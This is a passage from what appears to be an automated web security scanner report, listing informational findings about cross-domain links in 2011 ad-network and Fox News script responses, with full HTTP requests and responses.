...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3164&amp;ComboId=20658&amp;title=The-trick-for-your-brain-to-learn-a-new-language-f&amp;origin=168068-APP4">The trick for your brain to learn a new language fast</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3200&amp;ComboId=20168&amp;title=How-can-you-be-happier-and-less-stressed-in-2011-&amp;origin=168068-APP4">How can you be happier and less stressed in 2011?</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3264&amp;ComboId=20944&amp;title=Do-you-qualify-for-online-debt-relief-&amp;origin=168068-APP4">Do you qualify for online debt relief?</a>
...[SNIP]...
10.184. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&clickTag=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/i%3B235348774%3B0-0%3B1%3B56224653%3B4699-255/300%3B40375962/40393749/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 15:55:24 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802; expires=Sun, 09-Oct-2011 15:55:24 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style>                    body { font-family
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=2815&amp;ComboId=19246&amp;title=Secrets-car-insurance-companies-don-t-want-you-to-&amp;origin=222842-APP15">Secrets car insurance companies don&#39;t want you to know</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3164&amp;ComboId=20658&amp;title=The-trick-for-your-brain-to-learn-a-new-language-f&amp;origin=222842-APP15">The trick for your brain to learn a new language fast</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3200&amp;ComboId=20168&amp;title=How-can-you-be-happier-and-less-stressed-in-2011-&amp;origin=222842-APP15">How can you be happier and less stressed in 2011?</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3264&amp;ComboId=20944&amp;title=Do-you-qualify-for-online-debt-relief-&amp;origin=222842-APP15">Do you qualify for online debt relief?</a>
...[SNIP]...
10.185. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&clickTag=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/z%3B235348774%3B0-0%3B1%3B56224666%3B4699-255/300%3B40375962/40393749/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:31:01 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802; expires=Sun, 09-Oct-2011 12:31:01 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style>                    body { font-family
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/z;235348774;0-0;1;56224666;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=2815&amp;ComboId=19246&amp;title=Secrets-car-insurance-companies-don-t-want-you-to-&amp;origin=222837-APP11">Secrets car insurance companies don&#39;t want you to know</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/z;235348774;0-0;1;56224666;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3164&amp;ComboId=20658&amp;title=The-trick-for-your-brain-to-learn-a-new-language-f&amp;origin=222837-APP11">The trick for your brain to learn a new language fast</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/z;235348774;0-0;1;56224666;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3200&amp;ComboId=20168&amp;title=How-can-you-be-happier-and-less-stressed-in-2011-&amp;origin=222837-APP11">How can you be happier and less stressed in 2011?</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/z;235348774;0-0;1;56224666;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3264&amp;ComboId=20944&amp;title=Do-you-qualify-for-online-debt-relief-&amp;origin=222837-APP11">Do you qualify for online debt relief?</a>
...[SNIP]...
10.186. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&clickTag=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/w%3B235348774%3B0-0%3B1%3B56224659%3B4699-255/300%3B40375962/40393749/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:11 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802; expires=Sun, 09-Oct-2011 12:30:11 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style>                    body { font-family
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/w;235348774;0-0;1;56224659;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=2815&amp;ComboId=19246&amp;title=Secrets-car-insurance-companies-don-t-want-you-to-&amp;origin=222834-APP8">Secrets car insurance companies don&#39;t want you to know</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/w;235348774;0-0;1;56224659;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3164&amp;ComboId=20658&amp;title=The-trick-for-your-brain-to-learn-a-new-language-f&amp;origin=222834-APP8">The trick for your brain to learn a new language fast</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/w;235348774;0-0;1;56224659;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3200&amp;ComboId=20168&amp;title=How-can-you-be-happier-and-less-stressed-in-2011-&amp;origin=222834-APP8">How can you be happier and less stressed in 2011?</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/w;235348774;0-0;1;56224659;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3264&amp;ComboId=20944&amp;title=Do-you-qualify-for-online-debt-relief-&amp;origin=222834-APP8">Do you qualify for online debt relief?</a>
...[SNIP]...
10.187. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&clickTag=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/i%3B235348774%3B0-0%3B1%3B56224653%3B4699-255/300%3B40375962/40393749/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 13:13:44 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802; expires=Sun, 09-Oct-2011 13:13:44 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style>                    body { font-family
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=2815&amp;ComboId=19246&amp;title=Secrets-car-insurance-companies-don-t-want-you-to-&amp;origin=168070-APP6">Secrets car insurance companies don&#39;t want you to know</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3164&amp;ComboId=20658&amp;title=The-trick-for-your-brain-to-learn-a-new-language-f&amp;origin=168070-APP6">The trick for your brain to learn a new language fast</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3200&amp;ComboId=20168&amp;title=How-can-you-be-happier-and-less-stressed-in-2011-&amp;origin=168070-APP6">How can you be happier and less stressed in 2011?</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3264&amp;ComboId=20944&amp;title=Do-you-qualify-for-online-debt-relief-&amp;origin=168070-APP6">Do you qualify for online debt relief?</a>
...[SNIP]...
10.188. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&clickTag=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/i%3B235348774%3B0-0%3B1%3B56224653%3B4699-255/300%3B40375962/40393749/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:33:13 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=ac15f268-f17e-4e14-94c4-434c4073b802; expires=Sun, 09-Oct-2011 12:33:13 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style>                    body { font-family
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=2815&amp;ComboId=19246&amp;title=Secrets-car-insurance-companies-don-t-want-you-to-&amp;origin=222835-APP9">Secrets car insurance companies don&#39;t want you to know</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3164&amp;ComboId=20658&amp;title=The-trick-for-your-brain-to-learn-a-new-language-f&amp;origin=222835-APP9">The trick for your brain to learn a new language fast</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3200&amp;ComboId=20168&amp;title=How-can-you-be-happier-and-less-stressed-in-2011-&amp;origin=222835-APP9">How can you be happier and less stressed in 2011?</a>
...[SNIP]...
<h4><a target="_Blank" href="http://ad.doubleclick.net/click;h=v8/3ae4/3/0/*/i;235348774;0-0;1;56224653;4699-255/300;40375962/40393749/1;;~aopt=2/0/ff/0;~sscs=?http://www.aralifestyle.com/article.aspx?UserFeedGuid=aa4f6d17-56c2-46b9-a322-dcfb56763b0d&amp;ArticleId=3264&amp;ComboId=20944&amp;title=Do-you-qualify-for-online-debt-relief-&amp;origin=222835-APP9">Do you qualify for online debt relief?</a>
...[SNIP]...
10.189. http://www.foxnews.com/static/all/js/ad.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxnews.com
Path:   /static/all/js/ad.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /static/all/js/ad.js?b20110406 HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: surround=undefined; rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540668835%3B%20omtr_lv%3D1302538868837%7C1397146868837%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540668837%3B%20s_nr%3D1302538868843%7C1305130868843%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dfnc%253Aroot%253Aroot%253Achannel%255E%255EPolitics%255E%255Efnc%253Aroot%253Aroot%253Achannel%2520%257C%2520Politics%255E%255E%3B%20s_sq%3Dfoxnews%253D%252526pid%25253Dfnc%2525253Aroot%2525253Aroot%2525253Achannel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.foxnews.com/politics/index.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 06 Apr 2011 20:15:05 GMT
ETag: "3c3401d-7ce9-a5ff4440"
Accept-Ranges: bytes
X-FoxNews-EdgeTTL: 24h
Content-Type: application/x-javascript
Cache-Control: max-age=42841
Expires: Tue, 12 Apr 2011 04:15:13 GMT
Date: Mon, 11 Apr 2011 16:21:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 31977

//Integration Services - v 0.99
var ad = {
   _tile: 0,
   ord: Math.floor(999999999*Math.random()),
dc: {
_svr: "http://ad.doubleclick.net",
_method: "adj",
       _url: "",
       _kw
...[SNIP]...
</scr"+ "ipt>";//document.write(\"<iframe src='http://www.google.com'></iframe>
...[SNIP]...
10.190. http://www.foxnews.com/static/fn2/ws/politics/js/channel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxnews.com
Path:   /static/fn2/ws/politics/js/channel.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /static/fn2/ws/politics/js/channel.js?b20110406 HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: surround=undefined; rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540668835%3B%20omtr_lv%3D1302538868837%7C1397146868837%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540668837%3B%20s_nr%3D1302538868843%7C1305130868843%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dfnc%253Aroot%253Aroot%253Achannel%255E%255EPolitics%255E%255Efnc%253Aroot%253Aroot%253Achannel%2520%257C%2520Politics%255E%255E%3B%20s_sq%3Dfoxnews%253D%252526pid%25253Dfnc%2525253Aroot%2525253Aroot%2525253Achannel%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.foxnews.com/politics/index.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 06 Apr 2011 20:15:24 GMT
ETag: "b9000a-17fd-a7212f00"
Accept-Ranges: bytes
X-FoxNews-EdgeTTL: 24h
Content-Type: application/x-javascript
Cache-Control: max-age=60678
Expires: Tue, 12 Apr 2011 09:12:30 GMT
Date: Mon, 11 Apr 2011 16:21:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 6141

// Channel Script: POLITICS

$(document).ready( function() {
   
   fox.site.channel.loadDocReadyVars(); // store global variables only available on document.ready
   fox.site.channel.genericItems(); // gen
...[SNIP]...
(obj.state && obj.race_type) {
                   linkStr = linkStr.replace("${state}",obj.state).replace("${race}",obj.race_type);
                   item.attr("href",linkStr);
               }
           }
       }
       
   });
   
   $(".america .top").wrap("<a href='http://www.thefoxnation.com/'></a>
...[SNIP]...
